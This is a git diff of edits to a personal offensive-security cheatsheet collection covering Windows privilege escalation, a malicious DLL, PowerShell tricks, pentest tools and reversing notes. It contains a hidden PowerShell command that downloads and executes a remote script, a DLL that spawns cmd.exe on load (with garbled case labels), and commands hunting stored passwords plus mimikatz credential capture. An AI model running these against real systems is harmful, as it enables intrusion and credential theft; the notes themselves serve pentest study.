minor changes

cheatsheets/security/malware/createthread.md

@@ -36,12 +36,13 @@ DWORD WINAPI add(LPVOID lpParameters) {
 
 
 int main() {
-	
+
 	LPDWORD thId = (LPDWORD)malloc(sizeof(LPDWORD));
 	HANDLE hThread = CreateThread(NULL, 0, add, NULL, NULL, thId);
-	printf("Thread %d created!
+	printf("Thread %d created!\nHandle@%d\nError? %s",
-Handle@%d
+                thId,
-Error? %s", thId, hThread, GetLastError()?"Yeah probably":"Naah not really");
+                hThread,
+                GetLastError() ? "Yeah probably":"Naah not really");
 
 }
 ```

cheatsheets/security/pentesting/tools.md

@@ -9,12 +9,14 @@ tags: [security]
 ## Reconnaissance:
 
 * fierce
+* host
 * dig
 * whois
 * sparta
 * foca
 * recon-ng
 
+
 ## Vulnerability Scanner:
 
 * nikto
@@ -38,10 +40,12 @@ tags: [security]
 * radare2
 * gdb
 * x64dbg
+* Ghidra
 
 
 ## Networking:
 
+* bettercap ❤
 * macof         // Tool für macflooding
 * arpspoof
 * mitmproxy
@@ -51,9 +55,9 @@ tags: [security]
 
 ## Fuzzing:
 
+* AFL
 * zzuf      // Mutation based fuzzer
 * sully     // Generation based fuzzer
-* AFL
 * scapy     // is fuzzing network packets
 
 ## Password Cracking:

cheatsheets/security/reversing/anti_disassembly.md → cheatsheets/security/reversing/anti-disassembly.md

@@ -156,7 +156,7 @@ mov ebp, esp
 ```
 
 
-### Misuing Structed Exception Handlers (SEH)
+### Misusing Structed Exception Handlers (SEH)
 
 * Use the SEH to confuse Disassemblers
 * add a custom SE Handler at fs:0x00 with

cheatsheets/security/web/php_type_juggling.md → cheatsheets/security/web/php-type-juggling.md

@@ -6,9 +6,7 @@ tags: [security, web]
 
 # PHP Type Juggling
 
-Reference:
+Reference: [PHPMagicTricks-TypeJuggling.pdf](https://www.owasp.org/images/6/6b/PHPMagicTricks-TypeJuggling.pdf)
-
-https://www.owasp.org/images/6/6b/PHPMagicTricks-TypeJuggling.pdf
 
 PHP has two main comparison modes, lets call them loose (==) and strict (===).
 

cheatsheets/security/web/php_vulnerabilities.md → cheatsheets/security/web/php-vulnerabilities.md

@@ -4,7 +4,7 @@ categories: [cheatsheets]
 tags: [security, web]
 ---
 
-# Top 24 PHP Vulnerabilities
+# Examples Vulnerabilities
 
 ## 1) Missing Typechecking
 

cheatsheets/security/windows/malicious-dll.md

@@ -18,8 +18,8 @@ BOOL APIENTRY DllMain(HMODULE hModule,
     switch (ul_reason_for_call) {
         case DLL_PROCESS_ATTACH:
             system("cmd.exe");
-        case DLL_THREAT_DETACH:
+        case DLL_PROCESS_DETACH:
-        case DLL_PROCESS_ATTACH:
+        case DLL_THREAT_ATTACH:
         case DLL_THREAT_DETACH:
             break;
     }

cheatsheets/security/windows/powershell.md

@@ -30,9 +30,9 @@ Get-Credentials // Nice login field for social engineering
 
 3) Load scripts from webserver and execute them (inline and in-memory)
 ```
-powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command IEX (New-Object Net.WebClient).DownloadString('http://URL-desSkripts'; Parameter
+powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command IEX (New-Object Net.WebClient).DownloadString('http://URL/script.ps1');
 ```
-Important:
+**Important:**
 
 -> Never use a unknown code from the internet for a client!
 

cheatsheets/security/windows/windows-administration.md

@@ -97,7 +97,7 @@ cmd> DRIVERQUERY                        ## Get Driver, can be interesting for 3r
 cmd> sc query                          ## get all services
 ```
 
-## Getting a Services that are not in C:\Windows
+## Getting services that are not in C:\Windows
 ```
 wmic service get name, displayname, pathname,startmode|findstr /i "auto"|findstr /i /v "C:\windows\"
 ```

cheatsheets/security/windows/windows_privesc_detail.md → cheatsheets/security/windows/windows-local-privesc.md

@@ -6,7 +6,7 @@ tags: [security, windows]
 
 # Priviledge Escalation
 
-1) Information Gathering
+### 1) Information Gathering
 
 Get as much information about the system as possible.
 
@@ -28,9 +28,9 @@ Detailed Commands to extract this information can be found in:
 * wmic.md
 
 
-2) Check the Quick Fails
+### 2) Check the Quick Fails
 
-2.1) check the patches of the machine
+#### 2.1) check the patches of the machine
 
 ```
 cmd> wmic qfe get Caption,Description,HotFixID,InstalledOn
@@ -41,11 +41,13 @@ cmd> wmic qfe get Caption,Description,HotFixID,InstalledOn
 * cmd> wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB.." /C:"KB.."
 ```
 
--> windows privchecker script?
+**Windows exploit-checker script:**
 
-Metasploit-Module: post/multi/recon/local_exploit_suggester (Windows & Linux)
+* Metasploit-Module: post/multi/recon/local_exploit_suggester (Windows & Linux)
+* https://github.com/SecWiki/windows-kernel-exploits/tree/master/win-exp-suggester
 
-2.2) Mass rollout aka sysprep/unattended
+
+#### 2.2) Mass rollout aka sysprep/unattended
 
 * for mass-rollout of windows machines, the tool sysprep is used
 * its possible that the config files are still laying around somewhere
@@ -65,7 +67,7 @@ Powersploit-module: Get-UnattendedInstallFile
 Metasploit-module:  post/windows/gather/enum_unattend
 ```
 
-2.3) Passwords saved in Group Policy Preferences
+#### 2.3) Passwords saved in Group Policy Preferences
 
 This is used to add local users via a domain account.
 Passwords are encrypted with AES -> Key was published on MSDN ;)
@@ -80,7 +82,8 @@ Metasploit-module:  post/windows/gather/credentials/gpp
 ```
 
 
-2.4) "AlwaysInstallElevated" Registry Key
+#### 2.4) "AlwaysInstallElevated" Registry Key
+
 This registry key, if set, lets unpriviledged users install .msi Files as NT AUTHORITY\SYSTEM
 Dafuq??
 Check the following registry keys: (both must be checked, BUT! if HKLM is checked, you can enable the HKCU one yourself)
@@ -94,7 +97,7 @@ Powersploit-module: Get-RegistryAlwaysInstallElevated
 Metasploit-module:  exploit/windows/local/always_install_elevated
 ```
 
-2.5) Search FS for Password files/password configs
+#### 2.5) Search FS for Password files/password configs
 
 The command below will search the file system for file names containing certain keywords. You can
 specify as many keywords as you wish.
@@ -113,7 +116,7 @@ cmd> reg query HKLM /f password /t REG_SZ /s
 cmd> reg query HKCU /f password /t REG_SZ /s
 ```
 
-2.6) Autologon - saved credentials
+#### 2.6) Autologon - saved credentials
 
 You can save the credentials in the registry to automaticall login at windows start
 
@@ -122,9 +125,9 @@ Powersploit: Get-RegistryAutoLogon
 ```
 
 
-3) More cool Stuff!
+### 3) More cool Stuff!
 
-3.1 Unquoted Service Paths:
+#### 3.1) Unquoted Service Paths:
 
 Get Services with a space in the Path an no quotes
 
@@ -134,7 +137,7 @@ Metasploit-module: exploit/windows/local/trusted_service_path
 ```
 
 
-3.2 Services, with file access:
+#### 3.2) Services, with file access:
 
 Lookout for services, where the current user has access to the path of the binary
 exploit: change binary to your own exe
@@ -145,7 +148,7 @@ Metasploit-module: [..]
 ```
 
 
-3.3 Services, with service access:
+#### 3.3) Services, with service access:
 
 Lookout for services, where the current user has access to the service itself
 exploit: change the path of the service executable to your own exe
@@ -155,9 +158,21 @@ Powersploit-module: Get-ModifiableService
 Metasploit-module: [..]
 ```
 
-3.4 DLL Load order hijacking:
+#### 3.4) DLL Load order hijacking:
 
 Search a executable which loads a dll from a path where you can write too, or
 one that loads an dll from a path, where you have access to a path earlier in the load order
 
 Example: file loads dll custom.dll which is in C:\Windows\System32
+
+
+### 4) Passwords
+
+There are the following passwords (stored) on a windows machine:
+
+* LM Hashes (old and unsafe, 2 * 7 Chars DES)
+* NTLM Hashes (since vista, md4(unicode(password))
+* DCC (Domain Cached Credentials) (mostly MsCacheV2 -> PBKDF2(...))
+* Plaintext (Service Passwords in the Registry)
+
+-> pretty much everything can be captured using mimikatz

cheatsheets/security/windows/windows-services.md

@@ -0,0 +1,46 @@
+---
+title: services.md
+categories: [cheatsheets]
+---
+# Services
+
+Services run without their own Process. Services are run as background jobs.
+Run & Scheduled by the Windows Service Manager (WSM) 
+
+Services got SYSTEM Priviledge (only as Administrator installable).
+Services are also a Way of Persistance (can be run on startup)
+
+## Win32 API Functions to manipulate Servies: 
+* OpenSCManager(): Returns HANDLE to a Service (ServiceControlManager)
+* CreateService(): Creates a new Service, and adds it to the SC Manager
+* StartService(): Starts a Service if set to "manually"
+
+## ServiceTypes:
+
+Different ServiceTypes that tell how a Service is executing ('Type'-Field in the Registry)
+
+* WIN32_SHARE_PROCESS: Code in a DLL, run from svchost.exe
+* WIN32_OWN_PROCESS: Code in a exe, runs a individuall Process
+* KERNEL_DRIVER: Used for loading Code into the Kernel
+
+Each Service gets a Registry Entry @ HKLM/SYSTEM/CurrentControlSet/Services/
+
+
+Access Service Information with 'sc qc "Service Name"'
+
+example: sc qc "VMware NAT Service"
+```
+C:\>sc qc "WinNat"
+[SC] QueryServiceConfig ERFOLG
+
+SERVICE_NAME: WinNat
+        TYPE               : 1  KERNEL_DRIVER
+        START_TYPE         : 3   DEMAND_START
+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME   : system32\drivers\winnat.sys
+        LOAD_ORDER_GROUP   :
+        TAG                : 0
+        DISPLAY_NAME       : Windows-NAT-Treiber
+        DEPENDENCIES       : Tcpip
+        SERVICE_START_NAME :
+```

cheatsheets/security/windows/windows_privesc.md

@@ -1,45 +0,0 @@
----
-title: Windows Priviledge Escalation
-categories: [cheatsheets]
-tags: [security, windows]
----
-
-# Windows Hacking - Priviledge Escalation
-
-1) Tools:
-
-    * Mimikatz
-    * Powersploit (github.com/PowershellMafia/powersploit)
-    * Empire
-    * PsAttack
-    * BloodHoundAD (github.com/BloodHoundAD/Bloodhound)
-
-2) Passwords and Storage
-
-There are the following passwords (stored) on a windows machine:
-
-* LM Hashes (old and unsafe, 2 * 7 Chars DES)
-* NTLM Hashes (since vista, md4(unicode(password))
-* DCC (Domain Cached Credentials) (mostly MsCacheV2 -> PBKDF2(...))
-* Plaintext (Service Passwords in the Registry)
-
--> pretty much everything can be captured using mimikatz
-
-3) Services
-
-```
-a) Check unquoted ServicePaths              (powersploit::Get-ServiceUnquoted)
-b) Check Service Permissions                (powersploit::Get-ModifiableService)
-c) Check Service Executable Permissions     (powersploit::Get-ModifiableServiceFile)
-```
-Get details about a service:
-
-```
-native:     sc query [<name>]
-psploit:    Get-ServiceDetail [<name>]
-```
-
-
-
-
-